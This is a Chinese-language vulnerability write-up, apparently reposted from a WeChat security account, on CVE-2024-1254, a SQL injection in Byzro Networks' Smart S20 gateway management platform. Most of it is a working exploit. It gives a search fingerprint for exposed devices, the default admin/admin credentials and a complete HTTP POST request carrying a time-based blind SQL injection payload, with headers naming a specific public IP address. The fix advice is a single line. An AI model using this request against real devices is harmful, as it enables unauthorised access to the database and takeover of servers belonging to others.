01
—
漏洞名称
02
—
漏洞影响
北京百绰智能S20管理平台的20231120版本
03
—
漏洞描述
北京百卓网络科技有限公司有限公司(以下简称百卓网络)是一家致力于构建下一代安全互联网的高科技企业。Byzro Networks中存在一个SOL注入漏洞智能S20网关智能管理平台。攻击者可以利用漏洞获取服务器权限,并操纵服务器文件以获取敏感信息。
04
—
title
=
"Smart管理平台"
05
—
漏洞复现
先登录进入系统,默认账号密码为admin/admin。
向靶场发送如下数据包执行盲注。注意:cookie字段需要在登录后替换为值
POST
/sysmanage/sysmanageajax.php
HTTP/1.11
Host
: x.x.x.x
Cookie
: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept
: */*
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate
Content-Type
: application/x-www-form-urlencoded;
Content-Length
: 109
Origin
: https://58.18.133.60:8443
Referer
: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest
: empty
Sec-Fetch-Mode
: cors
Sec-Fetch-Site
: same-origin
X-Forwarded-For
: 1.1.1.1
X-Originating-Ip
: 1.1.1.1
X-Remote-Ip
: 1.1.1.1
X-Remote-Addr
: 1.1.1.1
Te
: trailers
Connection
: close
src=manageadmin&type=add&id=(
select
*
from
(
select
+
if
(
length
(
database
())=
3
,
sleep
(
5
),
1
))a)|
1
|
1
&
value
=test2|
123456
漏洞复现成功
06
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-1254
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论